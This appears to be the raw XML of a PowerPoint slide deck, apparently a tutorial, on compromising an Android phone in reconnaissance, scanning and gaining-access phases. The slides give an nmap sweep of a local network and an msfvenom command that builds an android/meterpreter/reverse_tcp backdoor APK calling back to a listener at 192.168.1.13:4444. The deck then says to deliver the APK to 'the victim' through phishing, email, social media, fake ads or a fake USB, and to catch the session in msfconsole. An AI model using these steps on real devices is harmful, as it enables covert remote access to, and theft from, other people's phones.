            <a:ext cx="820132" cy="254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F8EBBC-DB64-5494-B015-1E7219AAF1C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1248939" y="4905348"/>
            <a:ext cx="248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Hacker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DE9666-0020-AD68-3F44-5136D0A8D53B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8941324" y="4936790"/>
            <a:ext cx="248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16059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C8948-6CFF-0087-1BB3-CD42394E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4" y="1921692"/>
            <a:ext cx="8090807" cy="4017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184E7-BAE6-4EF7-4789-EC4E02FA8DE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="705634" y="1253764"/>
            <a:ext cx="5324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/>
              <a:t>Find the Hacker’s Device I.P Address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DBDC1-2153-F7BC-316A-CEAF573B4BC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367646" y="339365"/>
            <a:ext cx="5417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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I. Reconnaissance Phase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307169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949D46-5629-3BA7-2F7E-EFD9F548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20" y="1715022"/>
            <a:ext cx="8915108" cy="3427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D024E-3AF2-DABB-01BC-129414499351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699225" y="1159498"/>
            <a:ext cx="737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/>
              <a:t>Check the Active devices in the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FE10-0488-6C39-F709-AC54089CBF95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367646" y="339365"/>
            <a:ext cx="541727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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>II. Scanning Phase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69603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7F9A5C-0927-5EEF-E5E0-64CAC3AB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6" y="1150328"/>
            <a:ext cx="4251489" cy="3650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9E927B-8F61-3F68-69AD-B62D2DECE800}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5010346" y="1150328"/>
            <a:ext cx="6710314" cy="2858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following Linux Commands </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-PH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gather more information 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PH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PH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PH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PH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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH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192.168.1.13/24 </a:t>
            </a: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(see all devices connected to your </a:t>
            </a:r>
            <a:b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network)</a:t>
            </a:r>
            <a:endParaRPr lang="en-P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P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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH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PH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PH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192.168.1.13/24</a:t>
            </a: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(see all devices connected and </a:t>
            </a:r>
            <a:b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open ports)</a:t>
            </a:r>
            <a:endParaRPr lang="en-P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5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BF005-B1E2-7D6E-A62A-C418B7C32AA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="784782" y="1186685"/>
            <a:ext cx="737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rgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create the Backdoor Script (option 1):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20383-07F8-16B3-113A-F1BE861C7DAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177174" y="1811909"/>
            <a:ext cx="1070649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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH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PH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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH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-p android/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH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PH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lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH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=192.168.1.13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH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lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH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=4444 -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH" sz="25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backdoor.apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH" sz="25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PH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A10A1-8B37-97F4-D6B5-5EB3AC30D341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247454" y="328404"/>
            <a:ext cx="6094428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PH" sz="2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III. Gaining Access </a:t>
            </a:r>
            <a:endParaRPr lang="en-PH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D2D8A-BF55-FCB6-3A07-28F61BDBC369}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="784782" y="3658086"/>
            <a:ext cx="737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solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create the Backdoor Script (you may specify the location):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B02900-FEBB-9244-6B32-0D167D942AC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1001598" y="4275166"/>
            <a:ext cx="10461395" cy="93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marR="141605">
              <a:lnSpc>
                <a:spcPct val="115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500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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> - p android/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500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500" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>=192.168.1.13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500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lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>=4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" spc="400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> -o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500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doods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>.apk</a:t>
            </a:r>
            <a:endParaRPr lang="en-PH" sz="2500" dirty="0"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6631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Bent-Up 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E002EC-40DA-FD45-452B-510FF78D447B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5988351" y="2750373"/>
            <a:ext cx="3145222" cy="1276993"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 2979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BD84C-35B0-277E-6798-DB1683DF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50" y="1845194"/>
            <a:ext cx="6033786" cy="193121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DB861C-3BC9-D227-07C0-02A5130DC819}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="555550" y="2248632"/>
            <a:ext cx="1546627" cy="154662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9833A-5FB5-01FD-08D0-BE12CB67B954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="555551" y="396980"/>
            <a:ext cx="9333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After Creating the Backdoor, send it to the victim’s device using any Phishing Attack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482EA-32D5-2A20-FCA1-B7CD801D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069" y="4107627"/>
            <a:ext cx="4249339" cy="25194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747D24-222F-5F21-C5A2-BE928D96F590}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620592" y="4107627"/>
            <a:ext cx="6094428" cy="195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1653540" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-PH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send the backdoor to the target device?</a:t>
            </a:r>
            <a:endParaRPr lang="en-P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  <a:tabLst>
                <a:tab pos="1653540" algn="l"/>
              </a:tabLst>
            </a:pP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it through email.</a:t>
            </a:r>
            <a:endParaRPr lang="en-P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  <a:tabLst>
                <a:tab pos="1653540" algn="l"/>
              </a:tabLst>
            </a:pP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it through any social media.</a:t>
            </a:r>
            <a:endParaRPr lang="en-P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  <a:tabLst>
                <a:tab pos="1653540" algn="l"/>
              </a:tabLst>
            </a:pP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a download website.</a:t>
            </a:r>
            <a:endParaRPr lang="en-P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  <a:tabLst>
                <a:tab pos="1653540" algn="l"/>
              </a:tabLst>
            </a:pP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very encouraging advertisement.</a:t>
            </a:r>
            <a:endParaRPr lang="en-P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  <a:tabLst>
                <a:tab pos="1653540" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-PH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fake USB.</a:t>
            </a:r>
            <a:endParaRPr lang="en-PH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22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F3F995-9A25-410E-E9CC-110C4A05D048}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="262518" y="378127"/>
            <a:ext cx="933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Run the Metasploit from the Hacker’s Device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782D29-32A5-0429-48E0-C7957C338C7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="262518" y="957581"/>
            <a:ext cx="45248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&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-PH" sz="2500" b="1" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-PH" sz="25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6A08D6-9885-89EA-CCF2-F5BD7D1B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89" y="1434635"/>
            <a:ext cx="6401892" cy="53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529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20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-27T05:34:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-27T07:25:53Z</dcterms:modified>
</cp:coreProperties>
</file>